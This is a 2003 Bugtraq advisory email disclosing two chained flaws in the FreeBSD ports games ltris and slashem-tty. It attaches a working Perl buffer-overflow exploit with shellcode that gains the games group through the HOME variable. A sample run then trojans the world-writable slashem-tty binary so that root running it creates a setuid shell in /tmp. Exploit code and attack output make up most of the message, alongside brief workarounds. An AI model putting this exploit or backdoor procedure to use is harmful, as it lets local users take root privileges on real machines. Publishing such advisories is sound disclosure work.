[30074] in bugtraq
ltris-and-slashem-tty possible trouble
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Fri May 9 13:45:39 2003
Message-ID: <002901c315b7$8ae6dd10$24029dd9@tuborg>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
To: <bugtraq@securityfocus.com>
Date: Fri, 9 May 2003 01:14:14 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0026_01C315C8.4E358A40"
------=_NextPart_000_0026_01C315C8.4E358A40
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
I can spend my time with a rhyme.
bob gimme op.
dvdman-san
hold kæft nogle kager, man sku tro jeres forældr' var bager.
--
kokanin
------=_NextPart_000_0026_01C315C8.4E358A40
Content-Type: text/plain;
name="DSR-ltris-and-slashem-tty.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="DSR-ltris-and-slashem-tty.txt"
I. BACKGROUND
ltris is a tetris clone shipping with the freebsd ports system.
More info is available at http://lgames.sourceforge.net/#ltris
slashem-tty is a nethack derivative shipping with the freebsd ports
system. More info is available at http://slashem.sourceforge.net/.
II. DESCRIPTION
ltris: Insufficient bounds checking gives gid games.
slashem-tty: wrong file permissions allows alteration/code injection.
together: all sorts of suid shells from eager slashem-tty players.
III. ANALYSIS
slashem-tty is the real sinner in this case, since not much fun can be
had with gid games. The ltris is just a handy way to do this.
Example run:
--
-bash-2.05b$ perl DSR-ltris.pl=20
Address: 0xbfbff825
LTris 1.0.1
Copyright 2002 Michael Speck
Published under GNU GPL
---
Looking up data in: /usr/local/share/ltris
id
uid=3D1000(kain) gid=3D1000(kain) egid=3D13(games) groups=3D13(games), =
1000(kain), 0(wheel)
ls -la /usr/local/share/slashem-tty/slashem-tty
-rwxrwxr-x 1 games games 1667192 Oct 5 12:19 =
/usr/local/share/slashem-tty/slashem-tty
cp /usr/local/share/slashem-tty/slashem-tty =
/usr/local/share/slashem-tty/slashem-tty.so
echo "cp /bin/sh /tmp/.$$ && chmod 4755 /tmp/.$$" > =
/usr/local/share/slashem-tty/slashem-tty
echo "/usr/local/share/slashem-tty/slashem-tty.so" >> =
/usr/local/share/slashem-tty/slashem-tty
--
Now sit back and wait for someone(root) to start slashem-tty, and have =
fun
with their privileges.
IV. DETECTION
ltris-1.0.1,1 shipping with freebsd ports as per 25/2-03 is vulnerable.
slashem-tty-0.0.6E.4F.8 shipping with freebsd ports as per 25/2-03 is =
vulnerable.
V. WORKAROUND
lousy: chmod -s `which ltris`
better: chmod -w `which slashem-tty`
VI. VENDOR FIX
unknown
VII. CVE INFORMATION
unknown
VIII. DISCLOSURE TIMELINE
unknown
IX. CREDIT
Knud Erik H=F8jgaard/kokanin, dtors security research
------=_NextPart_000_0026_01C315C8.4E358A40
Content-Type: application/octet-stream;
name="DSR-ltris.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="DSR-ltris.pl"
#!/usr/bin/perl
$len =3D 520;
$ret =3D 0xbfbff825;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". =
#freebsd 29 bytes
"\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve =
/bin/sh
"\x62\x69\x6e\x2f\x73\x68\x23"; =
#zillionATsafemode.org
if (@ARGV =3D=3D 1) {
$offset =3D $ARGV[0];
}
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .=3D $nop;
}
$buffer .=3D $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret =3D pack('l', ($ret + $offset));
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
$buffer .=3D $new_ret;
}
local($ENV{'HOME'}) =3D $buffer;=20
exec("ltris 2>/dev/null");
------=_NextPart_000_0026_01C315C8.4E358A40--
